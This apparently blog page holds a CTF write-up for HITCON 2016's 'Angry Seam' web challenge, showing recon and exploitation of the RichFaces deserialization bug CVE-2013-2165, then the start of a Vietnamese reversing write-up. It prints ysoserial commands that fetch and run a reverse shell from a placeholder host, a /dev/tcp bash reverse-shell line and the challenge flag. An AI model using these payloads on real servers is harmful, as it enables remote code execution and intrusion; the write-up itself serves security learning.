Web500 Hitconctf 2016 and exploit CVE-2013-2165

*** Problem: Angry Seam***
Description
Why my teammate, Sean, is so angry?
http://52.198.197.227:8080/angryseam/
Hint
None

*** Solution: ***

1. Reconnaissance website

This website has functions: register, login, change profile, report url, logout. Creating user and test some functions of website is the first step I do.
homepage

I use burpsuite free for proxying and mapping website.
This is the result:
burpsuite_mapping

Based on extension of urls (.seam) and problem description, It seems that this website use Jboss Seam framework (http://seamframework.org). Response header “Server: Apache-Coyote/1.1” => server run Apache tomcat (it might not run jboss application server). Application context is angryseam (So, application deployed mostly is angryseam.war).
This website have interesting request: http://52.198.197.227:8080/angryseam/css.seam?location=user.css&cid=15318. Change location parameter to other value, server return error 500 Exception. This error told our server run Apache tomcat 7.0.52, application use JSF technology (.xhtml) for ui templates. There some packages of jboss seam framework: org.jboss.seam.*, org.jboss.seam.example.jpa.* and strange package I don’t know: org.ajax4jsf.webapp.* . I test some path traveral payloads with hoping to get source code application,But i couldn’t get any interesting files in server: angryseam.war, WEB-INF/web.xml, css.xhtml,…

jboss_exception

I do continue exploring the website. The next function I pay attention to is resport.seam. We can enter a url and submit for reporting to admin. I think about XSS vulnerability and try some payloads for xss testing. I’m still not success .

I search google package org.ajax4jsf.webapp.*. This package belongs to Richfaces library. http://richfaces.jboss.org library. This library help our programming ajax-based web application more easier. It ussually combines with Jboss Seam framework and JSF, Hibernate to create a stack techonology for developing enterprise web application java. Moreover, the version of Richfaces of this website is 3.3.3.Final (Look again second images). Util then, I mostly understand technologies which the author uses for building website. However, how do the author code this website? Reading html code generated in some pages: login.seam, register.seam,i see some keywords: User Name, Real Name, Password, Verify Password, verifyDecorate, passwordDecorate,… In addtionally, package name org.jboss.seam.example.jpa.* give us some hints. The author seem to use a example application of Jboss seam to build this website. So, I download some versions of Jboss Seam (jboss-seam-2.3.1.Final, … ) and verify my thingking. I found that Jboss seam 2.2.1.Final is exactly version which website use. Jboss seam 2.2.1Final have a example application named “jpa”; it also have some functions: register, login,logout with some keywords: User Name, Real Name, verifyDecorate,..; and it also use Richfaces 3.3.3Final :)))))

jpa_example

Next, I search google for all of well-known vulneability of technolgies which website uses: jboss seam 2.2.1, Richfaces 3.3.3Final, Tomcat 7.0.52, Hibernate 3,…
I found a interesting vulnerability of Jboss seam and Richfaces:

The CVE-2013-2165 is about java deserialize vulnerability. This is well-known vulnerability discovered in so many applications recently. So I decide to try exploit this bug. The chance of success is not much. I’m not sure that this is the correct solution for this ctf challenge but it’s worth exploring.
In the past, I have a few experiences with java framwork such as struts, spring, hibernate,.. . Therefore,firstly, I will setup a debug environment for example application “jpa” of jboss seam 2.2.1Final.

2. Setup Environment

My Environment:
– Windows x64
– Java JDK 8u101 x86 (newest, download from oracle homepage)
– Eclipse J2EE Kepler
– Apache Tomcat 7.0.52 (download from apache tomcat homepage) for run app.
– Maven 3 (embbed in Eclipse ) for compiling and packaging app.
– “jpa” example application (use Jboss Seam 2.2.1Final, JSF 1.2, Richfaces 3.3.3Final, hsqldb, hibernate3, log4j…)
I willnot talk so much about this part because it relates much to java web development. And this is a long process, I think so. Someone who want to build this example application should read jboss documentation, learn some technology servlet, jsp ,jsf, hibernate, logging,… and some tools such as maven (very important, support downloading source and deep debug in core framework), eclipse.
I recommend this site for learning java framework: http://mkyong.com
Some hours fix bug, I have this example application run :)

run_jpa_example

3. Exploit CVE-2013-2165

The information of this cve is little short and hard to understand. The vulnerability is in ResourceBuilderImpl class. Search for this class, I know this class is in richfaces-impl-3.3.3.Final.jar:org.ajax4jsf.resource.ResourceBuilderImpl.class. Using maven to build project, I could easily view source code of this class. This class seems to relate to resource management (js,css,img,..) of website. I can set some breakpoints in this class, and run project in debug mode in eclipse. But how the client request can route to this class for handling resource?

resourcebuilderimpl_debug

I check some normals request of website. And I found these uri in both example application and angryseam application:
http://52.198.197.227:8080/angryseam/a4j/g/3_3_3.Finalorg.ajax4jsf.javascript.AjaxScript
http://localhost:8082/jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js

Look at the prefix : “/a4j”. Resource requests for Richfaces use uri prefix “/a4j”. It means any request to server have uri prefix “/a4j”, Richfaces will handle them. And when I request this url in debug mode, a breakpoint in ResourceBuilderImpl hit. Great. Some hours with debugging and source code reading, I mostly understand flow request handling as following:
1. Browser request url: http://localhost:8082/jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxxxxxxxxxxxxxxx
2. Tomcat handle request and detect prefix “/a4j”, tomcat route this request to Richfaces
3. Richfaces handle request with input is “g/3_3_3.Finlaorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxxxxxxxxxxxxxxx”
Richfaces use ResourceBuilderImpl for parsing input and get resource
Richfaces ignore string “g/3.3.3.Final” (this string is a constant that depends on version of Richfaces)
Richfaces get path resource org/richfaces/renderkit/html/scripts/skinning.js
Richfaces get additional data from “DATA/xxxxxxxxxxxxxxxxxxxxxx”, extract raw data value: xxxxxxxxxxxxxxxxxxxxxx
Richfaces decompress data value (xxxxxxxxxxxxxxxxxxxx) and deserialize ← EXPLOIT

deserialize_data_in_uri

I can control uri request, so I also can control DATA part, which is the input for deserializing in ResourceBuilderImpl. I use ysoserial for generating payloads (https://github.com/frohoff/ysoserial).
Some payload for creating reverse shell:
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 “/usr/bin/wget -O /tmp/reverseshell http://x.x.x.x/reverseshell” > payload.bin
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 “/bin/bash /tmp/reverseshell” > payload.bin
reverseshell: /bin/bash -c ‘/bin/bash -i >/dev/tcp/x.x.x.x 2>&1’

Source code for creating DATA part from payloads:

gen_payload_and_data_part

Some result I run in server after reverse shell success:
Flag: hitcon{d0 you really g3t th1s fl4g by CSS RPO?}
File angryseam.war get from server: angryseam.war
(I think the author’s solution is about RPO attack)

P/s: I check tomcat and mysql packages in server because they have privilege escalation getroot vulnerability recently. But these version in server actually keep update and are not vulnerable.
tomcat_package
mysql_package

FINISH. THANKS FOR YOUR READING.

HackIM 2016 – donfos_reversing

Lâu lắm rồi mới quay lại chơi CTF, theo dự kiến thì thời gian tới sẽ chơi rất nhiều, nhưng sẽ chỉ chơi reverse thôi vì mình cảm thấy nó phần kiến thức cần phải thành thạo.

Đợt HackIM vừa rồi mình ngồi làm bài reverse cùng thằng em, hai anh em mất cả ngày trời cuối cùng cũng đã giải được bài donfos này. Cách làm phần cuối thì hơi ảo nhưng kệ ra được flag là mừng rồi.

Đề bài: re500 donfos_reversing

https://github.com/ctfs/write-ups-2016/tree/master/nullcon-hackim-2016/re/donfos-500

Đầu tiên, mình cũng down file về rồi vứt vào Ubuntu chạy thử, nó là file elf 64 bit. Khi chạy thì hỏi key, nhập lăng nhăng không ra flag gì cả. Giống như bài re300, mình strings thử thì biết được nó cũng dùng o-llvm để obfuscate code. Sau đó thì mình đem vào IDA để đọc code tĩnh trước. Nhưng mà bài này code hàm main nhìn phức tạp quá, xem chừng không thể ngồi đọc giả code với hợp ngữ được. Mình đoán là do hàm gốc đã phức tạp rồi cộng với việc dùng o-llvm để obfuscate nữa nên mới vậy. Continue reading HackIM 2016 – donfos_reversing